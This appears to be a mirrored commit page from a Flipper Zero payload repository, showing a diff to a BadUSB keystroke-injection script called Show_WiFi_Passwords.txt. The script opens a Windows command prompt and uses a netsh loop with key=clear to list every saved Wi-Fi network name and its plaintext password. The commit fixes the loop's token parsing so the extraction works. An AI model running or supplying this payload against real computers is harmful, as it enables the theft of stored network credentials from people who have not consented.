mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2025-02-22 12:33:43 +00:00
Update Show_WiFi_Passwords.txt
This commit is contained in:
parent
db37383417
commit
446f0c984c
@ -5,6 +5,6 @@ STRING cmd
|
|||||||
DELAY 500
|
DELAY 500
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 1500
|
DELAY 1500
|
||||||
STRING for /f "skip=9 tokens=12 delims=:" %i in ('netsh wlan show profiles') do @echo %j | netsh wlan show profiles %j key=clear | findstr /C:"SSID name" /C:"Key Content"
|
STRING for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | netsh wlan show profiles %j key=clear | findstr /C:"SSID name" /C:"Key Content"
|
||||||
DELAY 250
|
DELAY 250
|
||||||
ENTER
|
ENTER
|
||||||
|
Loading…
Reference in New Issue
Block a user